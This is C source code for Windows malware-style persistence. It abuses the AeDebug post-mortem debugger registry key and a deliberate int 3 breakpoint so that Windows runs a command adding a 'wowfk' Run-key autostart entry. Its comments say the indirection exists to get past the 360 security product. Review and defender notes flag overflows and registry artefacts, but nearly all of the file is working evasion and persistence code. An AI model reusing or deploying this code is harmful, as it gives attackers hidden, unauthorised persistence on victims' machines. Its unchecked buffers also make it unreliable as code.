// Mode switch read by SetAeDebug() and main().
// Non-zero: SetAeDebug() stores a `reg add ... Run ... /v wowfk` command line
// as the AeDebug "Debugger" string, and main() never takes its three-argument
// branch. Zero: SetAeDebug() stores "<own path> -cmd %ld" instead.
// NOTE(review): the name and the original comment in SetAeDebug() suggest this
// mode exists because of the 360 security product; that intent is inferred
// from naming only.
// NOTE(review): `true` requires <stdbool.h> (or a compiler that predefines it)
// when this file is built as C.
int pass360 = true;
/*
 * Registers a command line as the post-mortem (AeDebug) debugger for the
 * WOW6432Node registry view.
 *
 * Writes two REG_SZ values under
 * HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug:
 *   "Auto"     = "1"
 *   "Debugger" = a `reg add` command line that creates the Run value "wowfk"
 *                (pass360 != 0), or "<own path> -cmd %ld" (pass360 == 0).
 *
 * Returns 1 when the "Debugger" value was written. If RegCreateKeyA or the
 * "Auto" write fails, the Win32 error code is returned unchanged; if only the
 * "Debugger" write fails, 0 is returned.
 *
 * NOTE(review): the return value mixes Win32 error codes with a 1/0 flag, so
 * callers can only test for == 1.
 * NOTE(review): the result of GetModuleFileNameA is not checked.
 * NOTE(review): sprintf() writes a ~100-byte fixed prefix plus a path of up to
 * MAX_PATH bytes into a MAX_PATH buffer, and the strncat() bound is the length
 * of the suffix rather than the space left in the destination; both can write
 * past the end of the array when the module path is long.
 *
 * Defender note: a change to the AeDebug "Debugger"/"Auto" values, or a new
 * "wowfk" value under ...\CurrentVersion\Run, is visible to registry auditing
 * on those keys. Writing under HKEY_LOCAL_MACHINE normally needs
 * administrative rights.
 */
int SetAeDebug()
{
    HKEY hAeDebug = NULL;
    DWORD status = 0;
    char selfPath[MAX_PATH] = {0};
    char regAddCmd[MAX_PATH] = {0};
    char *debuggerValue = NULL;

    // Full path of the running executable.
    GetModuleFileNameA(0, selfPath, MAX_PATH);

    if (pass360) {
        // Original note: this form is needed when 360 is online.
        sprintf(regAddCmd,
                "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v wowfk /d \"%s\" /f",
                selfPath);
        debuggerValue = regAddCmd;
    } else {
        // %ld receives the pid of the process that raised the exception, so
        // the resulting command is "<own path> -cmd <pid>".
        strncat(selfPath, " -cmd %ld", 10);
        debuggerValue = selfPath;
    }

    status = RegCreateKeyA(HKEY_LOCAL_MACHINE,
                           "SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\",
                           &hAeDebug);
    if (status != 0) {
        return status; // Win32 error code; the key was not opened
    }

    status = RegSetValueExA(hAeDebug, "Auto", 0, REG_SZ, (CONST BYTE *)"1", 1);
    if (status == 0) {
        DWORD valueLen = strnlen(debuggerValue, MAX_PATH);

        status = RegSetValueExA(hAeDebug, "Debugger", 0, REG_SZ,
                                (CONST BYTE *)debuggerValue, valueLen);
        // Collapse the Win32 status into 1 (written) / 0 (failed).
        status = (status == 0);
    }

    RegCloseKey(hAeDebug);
    return status;
}
/*
 * Adds the running executable, with the argument " -AutoRun", as the REG_SZ
 * value "wowfk" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 *
 * Returns 1 when the value was written and 0 when RegSetValueExA failed. If
 * RegCreateKeyA fails, its Win32 error code is returned unchanged.
 *
 * NOTE(review): the result of GetModuleFileNameA is not checked, and the
 * strncat() bound (9) is the suffix length, not the space remaining in the
 * MAX_PATH buffer, so a long module path can overflow it.
 *
 * Defender note: this is a Run-key autostart entry; the value name "wowfk"
 * and the " -AutoRun" argument are the observable artefacts.
 */
int SetAutoRun()
{
    char runCommand[MAX_PATH] = {0};
    HKEY hRun = NULL;
    DWORD status = 0;

    // Full path of the running executable.
    GetModuleFileNameA(0, runCommand, MAX_PATH);

    status = RegCreateKeyA(HKEY_LOCAL_MACHINE,
                           "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                           &hRun);
    if (status != 0) {
        return status; // Win32 error code; nothing was written
    }

    strncat(runCommand, " -AutoRun", 9);
    status = RegSetValueExA(hRun, "wowfk", 0, REG_SZ,
                            (CONST BYTE *)runCommand,
                            (DWORD)strnlen(runCommand, MAX_PATH));
    RegCloseKey(hRun);

    // 1 = value written, 0 = write failed.
    return status == 0;
}
/*
 * Terminates the process whose id is given as a decimal string.
 *
 * strPid: process id in text form; converted with atoi(), so non-numeric
 *         text becomes 0.
 *
 * Returns the TerminateProcess() result (non-zero on success), or 0 when the
 * process could not be opened.
 *
 * NOTE(review): the handle is opened with PROCESS_ALL_ACCESS although only
 * TerminateProcess() is called on it.
 * NOTE(review): strPid is dereferenced by atoi() without a NULL check; the
 * only visible caller passes argv[2] after checking argc == 3.
 */
int KillExceptProcess(char *strPid)
{
    HANDLE target = OpenProcess(PROCESS_ALL_ACCESS, 0, atoi(strPid));

    if (!target) {
        return 0;
    }

    int terminated = TerminateProcess(target, 0);
    CloseHandle(target);
    return terminated;
}
/*
 * Entry point with two modes, selected by argument count.
 *
 * argc == 1: calls SetAeDebug(); on success shows a message box and executes
 *            `int 3`, which raises a breakpoint exception in this process.
 *            NOTE(review): presumably this is meant to make Windows start the
 *            command that SetAeDebug() just registered - confirm.
 * argc == 3 and pass360 == 0: treats argv[2] as the pid of the faulting
 *            process (the "<own path> -cmd <pid>" form written by
 *            SetAeDebug()), terminates it, then calls SetAutoRun().
 *
 * NOTE(review): argv[1] is never compared with "-cmd"; any three-argument
 * invocation reaches the second branch when pass360 is 0.
 * NOTE(review): `_asm int 3` is MSVC x86 inline assembly, and there is no
 * explicit return statement.
 */
int main(int argc, char *argv[])
{
    if (argc == 1) {
        if (SetAeDebug() == 1) {
            MessageBoxA(0, "See", "Done", 0);
            _asm int 3
        }
    } else if (argc == 3 && !pass360) {
        // Prevent a second execution: end the faulting process first, and
        // add the autorun entry only if that succeeded.
        if (KillExceptProcess(argv[2]) && SetAutoRun() == 1) {
            MessageBoxA(0, "AddAutoRunDone", "AutoRun", 0);
        }
    }
}